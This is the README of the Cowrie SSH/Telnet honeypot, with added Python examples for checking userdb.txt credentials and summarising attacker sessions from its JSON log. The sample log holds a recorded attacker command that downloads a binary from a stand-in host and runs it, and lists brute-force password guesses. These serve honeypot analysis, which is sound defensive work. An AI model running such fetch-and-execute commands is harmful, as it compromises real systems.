Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

README.md

Cowrie

Cowrie is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker.

Cowrie is developed by Michel Oosterhof.

Features

Some interesting features:

  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can cat files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in a UML-compatible (User Mode Linux tty log) format for easy replay with the original timings
  • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection

Additional functionality over standard Kippo:

  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Forward SMTP connections to SMTP Honeypot (e.g. mailoney)
  • Logging in JSON format for easy processing in log management solutions
  • Many, many additional commands

Requirements

Software required:

  • Python 2.7+ (Python 3 is not yet supported due to Twisted dependencies)
  • Zope Interface 3.6.0+
  • Twisted 12.0+
  • python-crypto
  • python-cryptography
  • python-pyasn1
  • python-gmpy2 (recommended)
  • python-mysqldb (for MySQL output)
  • python-OpenSSL

Files of interest:

  • cowrie.cfg - Cowrie's configuration file. Default values can be found in cowrie.cfg.dist
  • data/fs.pickle - fake filesystem
  • data/userdb.txt - credentials allowed or disallowed to access the honeypot
  • dl/ - files transferred from the attacker to the honeypot are stored here
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here or use bin/fsctl
  • log/cowrie.json - transaction output in JSON format
  • log/cowrie.log - log/debug output
  • log/tty/*.log - session logs
  • txtcmds/ - file contents for the fake commands
  • bin/createfs - used to create the fake filesystem
  • bin/playlog - utility to replay session logs
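The list above says data/userdb.txt holds the credentials the honeypot accepts or refuses, but not how a line is matched. The following is an added example, not Cowrie's own code. It assumes the userdb.txt layout as the author of this example understands it for this era of Cowrie: one `login:uid:password` entry per line, a password of `*` accepting any password for that login, and a leading `!` marking a password that must be refused even though a wildcard entry exists. Check that against the data/userdb.txt in your checkout before relying on it.

```python
"""Check a (login, password) pair against a data/userdb.txt-style file.

Added example, not part of Cowrie. The file format (login:uid:password,
'*' = accept any password, leading '!' = refuse this password) is assumed
from the data/userdb.txt of this era; verify it against your own copy.
"""

# Constructed sample file contents, not taken from the project. The deny
# entries trap the obvious guesses so the first attempt fails the way a real
# host would, and the wildcard lets a persistent attacker in afterwards.
SAMPLE_USERDB = """\
# comment lines and blank lines are ignored
root:0:!root
root:0:!123456
root:0:*
richard:1000:fout
"""


def load_userdb(text):
    """Parse userdb.txt text into a list of (login, uid, password) tuples.

    Malformed lines raise rather than being skipped: a silently ignored
    deny entry would let a password through that you meant to refuse."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            raise ValueError("userdb line %d: expected login:uid:password" % lineno)
        login, uid, password = parts
        entries.append((login, int(uid), password))
    return entries


def check_login(entries, login, password):
    """Return True if the honeypot should accept this login.

    Deny entries ('!pass') are evaluated first and independently of file
    order, so 'root:0:*' can never override 'root:0:!root'. A plain entry
    accepts only an exact match; a '!' entry is never an accepting match
    even if the attacker literally types the '!'-prefixed string."""
    candidates = [p for (l, _, p) in entries if l == login]
    if any(p == "!" + password for p in candidates):
        return False
    return any(p == "*" or (p == password and not p.startswith("!"))
               for p in candidates)


if __name__ == "__main__":
    db = load_userdb(SAMPLE_USERDB)
    for user, pw in [("root", "root"), ("root", "123456"), ("root", "hunter2"),
                     ("richard", "fout"), ("richard", "wrong"), ("admin", "admin")]:
        verdict = "accept" if check_login(db, user, pw) else "reject"
        print("%s / %s -> %s" % (user, pw, verdict))
```

The deny-before-wildcard ordering is the safety-relevant detail: if you are unsure whether your Cowrie version matches entries in file order, keep `!` entries above the `*` entry in data/userdb.txt so both readings agree.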
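log/cowrie.json is the output most people actually consume, and the natural first tool is a script that turns the per-event lines into a per-session triage summary with the indicators worth acting on (source IPs that got a shell, download URLs, payload hashes). The following is an added example, not part of Cowrie. The event ids and field names it keys on (`cowrie.login.failed`, `cowrie.login.success`, `cowrie.command.input`, `cowrie.session.file_download`, `session`, `src_ip`, `username`, `password`, `input`, `url`, `outfile`, `shasum`) follow Cowrie's JSON output as the author of this example knows it; treat them as assumptions and diff them against a real log before relying on the script. The log lines are constructed for the example, not real captures.

```python
"""Summarise a Cowrie JSON log (log/cowrie.json) per attacker session.

Added example, not part of Cowrie. Event ids and field names are assumed
from Cowrie's JSON output of this era; check them against your own log.
"""
import json
from collections import defaultdict

# Constructed sample log, one JSON object per line as Cowrie writes them.
# Addresses are documentation ranges, the hash is a placeholder, and the
# final non-JSON line stands in for a partially written record.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "src_port": 51234, "session": "a1b2c3d4", "timestamp": "2016-09-05T01:00:00.000000Z", "sensor": "hp1"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "username": "root", "password": "123456", "timestamp": "2016-09-05T01:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "username": "root", "password": "admin", "timestamp": "2016-09-05T01:00:02.000000Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "username": "root", "password": "toor", "timestamp": "2016-09-05T01:00:03.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "input": "uname -a", "timestamp": "2016-09-05T01:00:04.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "input": "wget http://198.51.100.9/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86", "timestamp": "2016-09-05T01:00:05.000000Z"}
{"eventid": "cowrie.session.file_download", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "url": "http://198.51.100.9/x86", "outfile": "dl/20160905010005_http___198_51_100_9_x86", "shasum": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "timestamp": "2016-09-05T01:00:06.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1b2c3d4", "timestamp": "2016-09-05T01:00:07.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.42", "src_port": 40000, "session": "ffee0011", "timestamp": "2016-09-05T02:00:00.000000Z", "sensor": "hp1"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.42", "session": "ffee0011", "username": "admin", "password": "admin", "timestamp": "2016-09-05T02:00:01.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "198.51.100.42", "session": "ffee0011", "timestamp": "2016-09-05T02:00:02.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.42", "sess
"""


def parse_events(text):
    """Yield one dict per well-formed JSON line; skip anything that does not
    parse (a half-written last line while Cowrie is running is the usual case)."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        if isinstance(ev, dict) and "eventid" in ev:
            yield ev


def summarize_sessions(text):
    """Group events by session id and keep what triage needs: source IP,
    the credential pairs that failed, the one that worked, the commands
    typed, and each download with its URL, local file and sha256."""
    sessions = defaultdict(lambda: {"src_ip": None, "failed": [], "success": None,
                                    "commands": [], "downloads": []})
    for ev in parse_events(text):
        s = sessions[ev.get("session", "?")]
        s["src_ip"] = s["src_ip"] or ev.get("src_ip")
        eid = ev["eventid"]
        if eid == "cowrie.login.failed":
            s["failed"].append((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.login.success":
            s["success"] = (ev.get("username"), ev.get("password"))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"),
                                   "outfile": ev.get("outfile"),
                                   "shasum": ev.get("shasum")})
    return dict(sessions)


def indicators(sessions):
    """Flatten the sessions into indicators for a blocklist or a sandbox queue:
    IPs that reached a shell, download URLs, and payload sha256 values."""
    shell_ips = sorted({s["src_ip"] for s in sessions.values() if s["success"]})
    urls = sorted({d["url"] for s in sessions.values() for d in s["downloads"]})
    hashes = sorted({d["shasum"] for s in sessions.values() for d in s["downloads"]})
    return {"shell_ips": shell_ips, "urls": urls, "sha256": hashes}


if __name__ == "__main__":
    sess = summarize_sessions(SAMPLE_LOG)
    for sid, s in sorted(sess.items()):
        print("%s %-15s failed=%d success=%s commands=%d downloads=%d" % (
            sid, s["src_ip"], len(s["failed"]), s["success"],
            len(s["commands"]), len(s["downloads"])))
    print(indicators(sess))
```

Point it at a real file with `summarize_sessions(open("log/cowrie.json").read())`. Sessions that never reach `cowrie.login.success` are brute-force noise and are kept only for credential statistics; the `shasum` values let you confirm that the files in dl/ are the ones the log claims were fetched before you hand them to a sandbox.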

Is it secure?

Maybe. See the FAQ.

I have some questions!

Please visit https://github.com/micheloosterhof/cowrie/issues

Contributors

Many people have contributed to Cowrie over the years. Special thanks to:

  • Upi Tamminen (desaster) for all his work developing Kippo on which Cowrie was based